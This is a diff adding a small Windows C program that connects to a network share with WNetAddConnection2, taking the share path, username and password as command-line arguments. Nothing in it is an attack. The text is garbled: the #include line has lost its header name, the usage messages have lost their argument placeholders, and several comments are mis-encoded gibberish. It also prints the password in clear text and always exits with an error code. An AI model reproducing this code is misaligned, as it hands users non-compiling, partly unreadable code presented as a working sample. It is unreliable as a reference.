+#include // ͷ
+
+// Need to link with Netapi32.lib and Mpr.lib
+
+int wmain(int argc, wchar_t* argv[])
+{
+
+ DWORD dwRetVal;
+
+ NETRESOURCE nr;
+ DWORD dwFlags;
+
+ if (argc != 4) {
+ wprintf(L"Usage: %s \n",
+ argv[0]);
+ wprintf(L" %s \\\\contoso\\public testuser testpasswd\n",
+ argv[0]);
+ exit(1);
+ }
+
+ wprintf(L"Calling WNetAddConnection2 with\n");
+ wprintf(L" lpLocalName = %s\n", L"");
+ wprintf(L" lpRemoteName = %s\n", argv[1]);
+ wprintf(L" lpUsername = %s\n", argv[2]);
+ wprintf(L" lpPassword = %s\n", argv[3]);
+
+ // Zero out the NETRESOURCE struct
+ memset(&nr, 0, sizeof(NETRESOURCE));
+
+ // Assign our values to the NETRESOURCE structure.
+
+ nr.dwType = RESOURCETYPE_ANY;
+ nr.lpLocalName = NULL; // F: ӳ䵽صĴ̣磺Z̵. ַΪգlpLocalNameΪNULLúԴӣض豸
+ nr.lpRemoteName = argv[1]; // \\192.168.232.128\temp ĿŹĴ
+ nr.lpProvider = NULL;
+
+ // Assign a value to the connection options
+ dwFlags = CONNECT_UPDATE_PROFILE;
+ //
+ // Call the WNetAddConnection2 function to assign
+ // a drive letter to the share.
+ //
+ dwRetVal = WNetAddConnection2(&nr, argv[3], argv[2], dwFlags);
+ //
+ // If the call succeeds, inform the user; otherwise,
+ // print the error.
+ //
+ if (dwRetVal == NO_ERROR)
+ wprintf(L"Connection added to %s\n", nr.lpRemoteName);
+ else
+ wprintf(L"WNetAddConnection2 failed with error: %u\n", dwRetVal);
+
+ exit(1);
+}
\ No newline at end of file